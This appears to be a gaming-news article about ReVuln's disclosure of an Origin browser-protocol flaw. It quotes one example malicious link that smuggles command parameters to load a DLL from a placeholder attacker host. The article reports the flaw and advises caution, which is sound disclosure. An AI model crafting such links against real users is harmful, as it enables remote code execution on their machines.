Origin browser protocol exploit shown to execute malicious software with a single click

Audio player loading…


(opens in new tab)

A security flaw has surfaced in the browser protocol Origin uses to launch games through custom links using the "origin:" structure. As Ars Technica (opens in new tab) reports, research group ReVuln demonstrates how a malicious program can be executed via a modified Origin link masquerading as a game launch.

Normally, an Origin game calls for a "origin://LaunchGame/[GameID]" command when launching through a browser. According to ReVuln, attackers can simply modify this path to something like "origin://LaunchGame/[GameID]?CommandParams= -openautomate ATTACKER_IPevil.dll" to toxify the command, causing it to run a foreign DLL.

In addition to a paper (opens in new tab) on its findings, ReVuln also recorded a brief video of the exploit in action.

Responding to Ars, an EA rep said, "Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure."

The issue isn't exclusive to Origin—other programs using this kind of protocol are vulnerable, including Steam, which the same group demonstrated attacks on in October (opens in new tab) .

The problem is in the same family as any other phishing attack launched from malformed links or trojan email attachments. In the end, the safest course is to never click on un-vetted links containing funky-looking parameters, be it an Origin launch or otherwise. Or, in the words of Dr. Breen: "Be wise. Be safe. Be aware."

Omri Petitte

Omri Petitte is a former PC Gamer associate editor and long-time freelance writer covering news and reviews. If you spot his name, it probably means you're reading about some kind of first-person shooter. Why yes, he would like to talk to you about Battlefield. Do you have a few days?